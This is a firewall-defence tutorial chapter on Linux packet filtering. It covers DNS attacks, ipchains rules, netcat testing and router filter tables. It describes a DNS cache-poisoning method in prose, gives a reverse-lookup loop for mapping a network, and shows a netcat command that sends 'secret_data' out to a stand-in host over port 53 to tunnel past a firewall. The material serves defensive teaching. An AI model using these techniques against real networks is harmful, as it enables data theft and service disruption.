Strategic Security Intelligence


Linux Firewalls


Service Level Attacks and Defenses

Copyright(c), 1990, 1995, 2002 Dr. Frederick B. Cohen - All Rights Reserved

DNS Service Attacks

An example of a UDP protocol is the Domain Name Service (DNS). DNS implements a distributed database used to translate between IP addresses and hostnames. Additional services include Start Of Authority (SOA) records that indicate what portions of the name space a server is responsible for giving definitive answers for, Mail eXchange (MX) records that provide referrals to mail servers for domain names, additional information about hosts and networks, and a wide range of other less important and optional content.

DNS runs primarily over UDP, and requests are answered with (1) a known response, (2) a referral to another server, or (3) no answer at all. The third possibility comes from the nature of UDP, which makes no delivery guarantees. The distributed database provides a tree-structured name space that is the basis for the hostnames commonly used in the Internet.

The example shown here begins at the InterNIC, the theoretical root of the domain name space. There are 13 root servers in the Internet, and these servers provide referrals that cross Top Level Domain (TLD) name spaces. For example, '.com', '.net', '.edu', and '.org' are all TLDs.

Since UDP is the protocol used in DNS lookups, DNS replies are very easy to forge. All an attacker has to do is generate a valid datagram with the source IP address of a DNS server in response to a request, and it will be trusted as accurate. The first response to arrive is typically the one trusted, so a simple program that provides a rapid but wrong response is often effective at disrupting DNS service.

The normal DNS lookup process starts with a lookup using the local DNS server. If the local server doesn't know the answer, it can either respond indicating that it does not know or look the answer up for you and return it once it knows it. If it simply says it doesn't know the answer, your resolver is then supposed to move up the DNS tree and ask the next higher DNS server if it knows the answer. If the local DNS server looks it up on its own, the process is the same except that the DNS server does the work through its resolver instead of through yours.

For example, if the DNS server for st.com doesn't know the answer to an inquiry about all.net, the request then goes to the .com TLD followed by the root servers. The root servers refer the process to the .net TLD, which refers it to the authoritative server for all.net, which supplies the answer. Any or all of these servers may cache previous responses to save time on subsequent lookups.
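One way to watch this chain of referrals is with the 'dig' utility from the BIND tools, if it is available. This is a minimal sketch; the server address in the second command is a hypothetical local resolver, not a real one:

    # Follow the referral chain from the root servers down to the
    # authoritative server, printing each step along the way.
    dig +trace all.net

    # Ask a specific (hypothetical) local server directly, with recursion
    # turned off, to see whether it answers, refers, or says nothing.
    dig +norecurse @192.168.1.1 all.net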

Because the DNS is a tree structure, it is possible that within st.com there could be a domain named all.net.st.com. If this is the case, then looking up all.net from within st.com will typically yield all.net.st.com instead of all.net! In the example below, a forged DNS response makes all.net inaccessible from st.com and leads internal users to be sent to the internal site when all.net is requested.

The normal behavior of a White Glove CD is actually an interesting example of this. If you configure your system for networking and try to go to 'www.google.com', you will get the well-known search engine. But if you simply enter 'google' you will find yourself connected to google.all.net. This is because in the '/etc/resolv.conf' file, the resolution process defaults to the all.net domain. The all.net domain servers in turn use a default response for any request that is otherwise unknown, which brings those requests to the all.net web site. In fact, if you try any domain that doesn't otherwise resolve, you will be directed to the all.net web site.
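As a sketch, the relevant part of such an '/etc/resolv.conf' looks something like the following; the nameserver addresses are hypothetical placeholders, not the actual all.net servers:

    # /etc/resolv.conf - sketch of a default-domain configuration
    search all.net            # unqualified names like 'google' become google.all.net
    nameserver 10.1.1.1       # hypothetical primary name server
    nameserver 10.1.1.2       # hypothetical secondary name server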

The caching behavior of DNS servers also creates a major potential problem in that a forged response can induce servers at high levels to provide wrong responses over an extended period of time. This is done by a process called cache poisoning, in which the caches of servers are poisoned with false responses, typically generated along with the requests. As an example, the attacker might forge both the requests and the responses so that the details of the port numbers become available. Start by sending a request that comes from the root servers to your own DNS server, and from that get the source port number of the request from the root server. Then make a request for all.net and generate a series of responses using destination port numbers for the root servers starting one higher than the port number on the request to your DNS server. It is very likely that you can generate hundreds of responses before the request ever hits all.net's DNS server and beat all.net to the punch. By using a high Time To Live (TTL) field in the DNS response, you can cause the root servers to give wrong answers for a long time - perhaps weeks.

Another attack can slow down services, map out a network, and possibly crash a DNS server simply by making a lot of requests. In this case, a flood of DNS requests is made using a large number of domain names. These names cause the server to do lots of lookups, multiplying your requests by a factor of 2 to 3 and thus flooding the service. In addition, these requests cause local cached DNS entries to be flushed from the cache or, in some cases, to overrun local memory and crash the computer. In one case the DNS service becomes very slow, while in the other it stops entirely. The same process generates a mapping of all of the domain names and their IP addresses. For example, you can go through all of the IP addresses in an IP address range requesting all of the hostnames, thus getting an initial picture of what the distant network looks like.
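The mapping half of this can be sketched with nothing more than a shell loop around the standard 'host' utility, sweeping a hypothetical address range and asking for the hostname of each address:

    # Reverse-resolve every address in a hypothetical class C network; each
    # answer reveals one more hostname on the distant network.
    for i in $(seq 1 254); do
        host 192.0.2.$i
    done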

Many of these DNS problems cannot be solved by firewalls; however, there are some that can. One way to address them is to limit the number of DNS servers available to your users by requiring that DNS only be allowed to known good DNS servers that themselves look up other domain names and cache the results. This prevents forgers from fooling your systems, unless they are also fooling other systems that are trusted by many other Internet users. Suppose we have a list of known good caching DNS servers. We then tell our users to configure for only those servers and provide a firewall rule like this:

We start by inserting rules so that no UDP traffic can flow into or out of either interface if it uses port 53. Then we insert rules before these two rules, one set for each server on the list of valid DNS servers, that allow input from and output to that server on each interface, so that packets from high ports on internal computers can flow to port 53 on these DNS servers and traffic from port 53 on those DNS servers can flow back to high ports on internal machines, all with UDP service only. This generates 4 rules per external DNS server, or in this case 12 rules.
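A minimal sketch of such a rule set follows. It assumes the ipchains interface, an internal network of 192.168.1.0/24 on eth1, the Internet on eth0, and three hypothetical trusted caching servers; the addresses, interfaces, and tool (ipchains or its iptables equivalent) will differ on a real installation:

    # Hypothetical trusted caching DNS servers
    SERVERS="10.1.1.1 10.2.2.2 10.3.3.3"

    # First, deny UDP traffic to port 53 through either chain.
    ipchains -I input  1 -p udp -d 0.0.0.0/0 53 -j DENY
    ipchains -I output 1 -p udp -d 0.0.0.0/0 53 -j DENY

    # Then insert, ahead of the DENY rules, four ACCEPT rules per trusted
    # server: queries going out and replies coming back, on each interface.
    for S in $SERVERS; do
        ipchains -I input  1 -p udp -i eth1 -s 192.168.1.0/24 1024:65535 -d $S 53 -j ACCEPT
        ipchains -I output 1 -p udp -i eth0 -s 192.168.1.0/24 1024:65535 -d $S 53 -j ACCEPT
        ipchains -I input  1 -p udp -i eth0 -s $S 53 -d 192.168.1.0/24 1024:65535 -j ACCEPT
        ipchains -I output 1 -p udp -i eth1 -s $S 53 -d 192.168.1.0/24 1024:65535 -j ACCEPT
    done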

The resulting ordering is important, and that is why rule insertion was used in each case. Since these are quite specific rules and we don't want some other rule that comes between or before them to allow an access that they deny, we must insert them at the beginning of the rule sequence. On the other hand, a subsequent rule that is never reached might allow all traffic from or to some other server. The DENY rules will prevent any DNS traffic from flowing even though the subsequent rule would otherwise allow it. The rules are each inserted before the last, so that the last rule inserted comes first on the list.

To test these rules, we set up two 'tcpdump' sessions on the firewall computer and try sending DNS requests outbound from internal computers toward the identified IP addresses. This is very easily done with 'netcat' as follows:
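The loop below is only a sketch of the shape of such a test; the addresses and source ports are hypothetical stand-ins, and the lists would be extended to cover all of the source and destination combinations described below:

    # A few hypothetical destinations: trusted servers plus some that should be blocked.
    for DEST in 10.1.1.1 10.2.2.2 10.3.3.3 10.9.9.9 192.0.2.53 198.51.100.7; do
        for SPORT in 1025 5353; do
            # -u = UDP, -p = local source port, -w 1 = give up after one second
            echo test | nc -u -p $SPORT -w 1 $DEST 53
        done
    done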

In this case we are sending a series of 72 different DNS attempts, 66 of which should fail and only 6 of which should succeed (from the valid IP address and each of the high ports to the valid DNS servers on port 53). We can see which ones get through the firewall and which do not by watching the two screens on the firewall box. Some that will not do DNS service may get through the firewall, but that is not what we are trying to block with these rules. Verify that the proper datagrams and only those datagrams flow through the firewall. If there is additional traffic on the firewall, use additional parameters to 'tcpdump' so as to only see the appropriate traffic.
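For example, a pair of sessions along these lines (the interface names are hypothetical) restricts the display to UDP traffic involving port 53 on each side of the firewall:

    # One window per interface, showing only UDP traffic to or from port 53
    tcpdump -n -i eth0 udp port 53
    tcpdump -n -i eth1 udp port 53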

Also note that this will not prevent some of the DNS attacks listed above, and is thus only of limited value in solving the problems of DNS.

Other UDP Service Attacks

In addition to the basic lack of sequencing and authentication in UDP, individual services that run over UDP have some serious historical problems associated with them.

Students in classes should pick one of these services as an example and create an appropriate set of firewall rules to protect against attacks such as those described for it. Then implement those rules and create and run a limited test program that tests these rules to make certain they operate as desired.

TCP Service Attacks

Many of the most desired and vulnerable services operate over TCP. Some of them are listed here with brief descriptions:

This list is far from comprehensive; it is merely representative of the sorts of things you are likely to encounter when trying to determine how to firewall your systems. If you cut off all services, you will be relatively safer from remote attack, but you will not gain the benefits of the Internet either. If you leave too many services on, you will be attacked often and pay a high price in defending your systems.

Tunnelling, Steganography, and Protocol Fudging

All of the defenses described up to this point based on TCP wrappers make assumptions about the associations of ports with services, but these assumptions are just that and nothing more. In fact, any packets that can flow in and out of a network can be used to implement any protocol desired by those who are able to generate and observe those packets. I use the term packets here instead of datagrams for a reason. Datagrams are those sequences of protocol elements defined for IP; in other words, datagrams are packets that follow the IP rules. But we can put anything we want into packets, and for the most part the Internet will transport them from place to place as they are. The most common techniques are tunneling, steganographic content, and protocol fudging. All three assume an inside system is cooperating with the attack, either intentionally or unwittingly.
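As a trivial sketch of protocol fudging, the pair of commands below moves an arbitrary byte stream through a firewall hole opened 'for DNS'; nothing about the traffic is DNS except the port number. The hostname and file names are hypothetical, the outside listener must run as root to bind port 53, and UDP gives no delivery guarantee, but the point stands:

    # On the cooperating outside machine: listen on the DNS port and save whatever arrives.
    nc -u -l -p 53 > received_data

    # On the inside machine: push a file out through the 'DNS' hole.
    nc -u -w 3 outside.example.com 53 < secret_data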

Router Firewalling with Simple Filters

Packet filter configuration is hard to get right. A configuration is usually an ordered sequence of rules, and the first rule to match is used. For example: (1) allow all hosts port 25 source into all hosts, (2) deny all '.edu' computers on all ports into all hosts, (3) allow all hosts port 113 into subnet-2, and so on. Most routers have adequate tools for creating such rules, but the resulting configurations are often hard to understand.

Prevent inbound telnet from all but isi.edu, allow outbound telnet, deny everything else:

Source IP    Source Port    Dest IP      Dest Port    What
*.isi.edu    >1023          Local        23           Allow
All          All            Local        23           Deny
Local        23             *.isi.edu    >1023        Allow
Local        >1023          All          23           Allow
All          23             Local        >1023        Allow
All          All            All          All          Deny

Allow World Wide Web (http), deny everything else.

Source IP    Source Port    Dest IP      Dest Port    What
All          >1023          Local        80           Allow
Local        80             All          >1023        Allow
All          All            All          All          Deny
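As a sketch, the web-only policy above might be expressed as Linux filter rules roughly as follows, assuming ipchains on a forwarding router and a hypothetical local web server at 192.168.1.10; an iptables version would be analogous:

    # Allow inbound connections from high ports anywhere to the local web server's port 80
    ipchains -A forward -p tcp -s 0.0.0.0/0 1024:65535 -d 192.168.1.10 80 -j ACCEPT
    # Allow the web server's replies from port 80 back out to high ports anywhere
    ipchains -A forward -p tcp -s 192.168.1.10 80 -d 0.0.0.0/0 1024:65535 -j ACCEPT
    # Deny everything else
    ipchains -A forward -j DENY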

The previous 2 combined:

Source IP    Source Port    Dest IP      Dest Port    What
*.isi.edu    >1023          Local        23           Allow
All          All            Local        23           Deny
Local        23             *.isi.edu    >1023        Allow
Local        >1023          All          23           Allow
All          23             Local        >1023        Allow
All          >1023          Local        80           Allow
Local        80             All          >1023        Allow
All          All            All          All          Deny

Blocking services with filters like these has limited utility for ftp (in active mode) and some other services because (1) they use random ports (active ftp, for example, requires the server to open a new connection from port 20 back to a random high port chosen by the client), (2) multiple services share ports, and (3) users can open high ports. Such filters are limited to pre-designed services and IP address pairs and have no built-in authentication.

Packet filters have strengths: (1) the controls tend to be fairly secure, (2) it is easier to prove the implementation correct, and (3) they are inexpensive to implement and maintain. They should (1) eliminate known bad IP addresses, (2) eliminate IP address forgeries, (3) eliminate services not in use, (4) send audit trails to trusted audit servers, (5) prevent control from remote sources, (6) implement reasonable passwords, and (7) be physically secure.

Packet filters have weaknesses: (1) inadequate granularity of control, (2) limited authentication, (3) state-independent decisions, (4) hard-to-manage complex configurations, (5) tunneling goes undetected, (6) poor or no misuse detection, (7) poor or no audit capabilities, (8) remote configuration limitations, (9) weak and default passwords and accesses, and so on.

Enhancing Routers for Firewalling

Encryption in packet filters is provided by some routers. This can include key exchange, which introduces key exchange issues; it is generally limited to pairs of routers from the same manufacturer; it allows virtual private networks (VPNs), but the chain is only as strong as the weakest link; and remote control and configuration end up being important here.

Routers between networks provide separation of internal networks and control points for information flow paths; they trade speed for protection and require transitivity analysis.

Authentication in packet filters is similar to encryption between networks and may involve time-variant password systems, challenge-response systems, packet authentication, and authentication daemons.

Summary